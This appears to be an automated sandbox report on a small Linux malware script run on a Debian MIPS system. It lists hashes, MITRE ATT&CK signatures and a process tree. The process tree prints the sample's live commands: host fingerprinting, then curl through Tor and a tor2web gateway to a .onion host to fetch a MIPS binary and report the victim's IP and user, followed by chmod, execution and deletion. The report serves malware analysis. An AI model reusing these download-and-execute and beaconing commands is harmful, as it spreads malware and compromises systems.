Analysis
-
max time kernel
87s -
max time network
155s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
24/10/2024, 18:05
Static task
static1
Behavioral task
behavioral1
Sample
74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
Resource
debian9-mipsel-20240226-en
General
-
Target
74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
-
Size
1KB
-
MD5
74accae8c7e0093939ab4e0cd1c2a7fd
-
SHA1
ae3b26988c72634e3f0daeb6486332530ba58324
-
SHA256
d5b4d0376c9b07f5be237d0e47aa9aa321489917d30559328e544c5d0347e5ea
-
SHA512
7e784dce4b2fa0f5a3659ccf7af43b3f4886bd5ea32acb26a60ccad38c5bc918789d7d01f2090bd3a053d783c6eba4571865f7e54de106232d83cae57e4172b9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 779 chmod 725 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/i 727 i -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 checkip.amazonaws.com 10 checkip.amazonaws.com -
Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs
Adversaries may deobfuscate or decode files or information to evade detection mechanisms.
pid Process 706 base64 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems id File opened for reading /proc/filesystems crontab File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/maps awk File opened for reading /proc/self/maps awk File opened for reading /proc/filesystems ls File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/maps awk File opened for reading /proc/self/maps awk File opened for reading /proc/filesystems crontab File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 7 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 774 curl 806 curl 816 ip 826 curl 755 curl 764 ip 772 curl -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/i bash
Processes
-
/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes1181⤵PID:699
-
/bin/bashbash2⤵
- Writes file to tmp directory
PID:707 -
/usr/bin/cutcut -d: -f63⤵PID:713
-
-
/usr/bin/idid -u3⤵
- Reads runtime system information
PID:715
-
-
/bin/grepgrep x:0: /etc/passwd3⤵PID:712
-
-
/usr/bin/headhead -n 1 /tmp/.X11-unix/013⤵PID:721
-
-
/bin/lsls /proc//status3⤵
- Reads runtime system information
PID:723
-
-
/bin/chmodchmod +x ./i3⤵
- File and Directory Permissions Modification
PID:725
-
-
/tmp/i./i3⤵
- Executes dropped EXE
PID:727
-
-
/bin/rmrm -f i3⤵PID:728
-
-
/bin/grepgrep -oE "\\b([0-9]{1,3}\\.){3}[0-9]{1,3}\\b"3⤵PID:734
-
-
/usr/bin/trtr " " "\\n"3⤵PID:735
-
-
/usr/bin/sortsort -uR3⤵PID:737
-
-
/bin/grepgrep -Ev "[.]0"3⤵PID:736
-
-
/usr/bin/headhead -n 13⤵PID:738
-
-
/usr/bin/curlcurl -4fsSLkA- -m200 "https://doh.no.ahadns.net/dns-query?name=relay.tor2socks.in"3⤵
- Reads runtime system information
PID:733
-
-
/bin/unameuname -m3⤵PID:747
-
-
/bin/datedate3⤵PID:750
-
-
/usr/bin/md5summd5sum3⤵PID:751
-
-
/usr/bin/cutcut -f1 -d-3⤵PID:752
-
-
/usr/bin/curlcurl -4fsSLk checkip.amazonaws.com3⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:755
-
-
/usr/bin/whoamiwhoami3⤵PID:760
-
-
/bin/unameuname -m3⤵PID:761
-
-
/bin/unameuname -n3⤵PID:762
-
-
/sbin/ipip a3⤵
- System Network Configuration Discovery
PID:764
-
-
/bin/grepgrep "inet "3⤵PID:765
-
-
/usr/bin/md5summd5sum3⤵PID:767
-
-
/usr/bin/awkawk "{print \$1}"3⤵
- Reads runtime system information
PID:768
-
-
/usr/bin/awkawk "{print \$2}"3⤵
- Reads runtime system information
PID:766
-
-
/usr/bin/base64base64 -w03⤵PID:771
-
-
/usr/bin/crontabcrontab -l3⤵
- Reads runtime system information
PID:770
-
-
/usr/bin/curlcurl -4fsSLkA- -m200 -x socks5h://:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./e8eb0a2cdf54c3ac6d6c2fd3f5796222 -e138.199.29.44_root_mips_debian9-mipsbe-20240611-en-3_680fff434a0b9c16e89d622a5bd1b890_3⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:772
-
-
/usr/bin/curlcurl -4fsSLkA- -m200 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in/int.mips -o./e8eb0a2cdf54c3ac6d6c2fd3f5796222 -e138.199.29.44_root_mips_debian9-mipsbe-20240611-en-3_680fff434a0b9c16e89d622a5bd1b890_3⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:774
-
-
/bin/chmodchmod +x ./e8eb0a2cdf54c3ac6d6c2fd3f57962223⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/e8eb0a2cdf54c3ac6d6c2fd3f5796222./e8eb0a2cdf54c3ac6d6c2fd3f57962223⤵PID:780
-
-
/bin/rmrm -f ./e8eb0a2cdf54c3ac6d6c2fd3f57962223⤵PID:781
-
-
/usr/bin/headhead -n 1 /tmp/.X11-unix/013⤵PID:782
-
-
/bin/lsls /proc//status3⤵
- Reads runtime system information
PID:783
-
-
/bin/grepgrep -oE "\\b([0-9]{1,3}\\.){3}[0-9]{1,3}\\b"3⤵PID:788
-
-
/usr/bin/trtr " " "\\n"3⤵PID:789
-
-
/usr/bin/sortsort -uR3⤵PID:791
-
-
/usr/bin/headhead -n 13⤵PID:792
-
-
/usr/bin/curlcurl -4fsSLkA- -m200 "https://dns.twnic.tw/dns-query?name=relay.tor2socks.in"3⤵
- Reads runtime system information
PID:787
-
-
/bin/grepgrep -Ev "[.]0"3⤵PID:790
-
-
/bin/unameuname -m3⤵PID:798
-
-
/bin/datedate3⤵PID:801
-
-
/usr/bin/md5summd5sum3⤵PID:802
-
-
/usr/bin/cutcut -f1 -d-3⤵PID:803
-
-
/usr/bin/curlcurl -4fsSLk checkip.amazonaws.com3⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:806
-
-
/usr/bin/whoamiwhoami3⤵PID:811
-
-
/bin/unameuname -m3⤵PID:812
-
-
/bin/unameuname -n3⤵PID:814
-
-
/sbin/ipip a3⤵
- System Network Configuration Discovery
PID:816
-
-
/bin/grepgrep "inet "3⤵PID:817
-
-
/usr/bin/md5summd5sum3⤵PID:819
-
-
/usr/bin/awkawk "{print \$2}"3⤵
- Reads runtime system information
PID:818
-
-
/usr/bin/awkawk "{print \$1}"3⤵
- Reads runtime system information
PID:820
-
-
/usr/bin/crontabcrontab -l3⤵
- Reads runtime system information
PID:823
-
-
/usr/bin/base64base64 -w03⤵PID:824
-
-
/usr/bin/curlcurl -4fsSLkA- -m200 -x socks5h://65.108.216.128:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./4db8a69be99c4cf3f0388ff8c87b69b0 -e138.199.29.44_root_mips_debian9-mipsbe-20240611-en-3_d41d8cd98f00b204e9800998ecf8427e_3⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:826
-
-
-
/usr/bin/base64base64 -d2⤵
- Deobfuscate/Decode Files or Information
PID:706
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5B
MD5f4b524261fce06c1fbd10b4681ad0b97
SHA1c595d1a14f6aa42cc1aa7ab4416c39ada07ca89d
SHA2569577a8bfed904bd55390ba203f1a233be1981b36fa945537eb3be5b2446de031
SHA512ab280f109ee7dcfb8031e160d0235e9bfb72cabde44b21355d9e6db2873530d8537e3bdbb8faf6cd8d6b3eac33f58de7694201b93f277d0b587bf2534df14449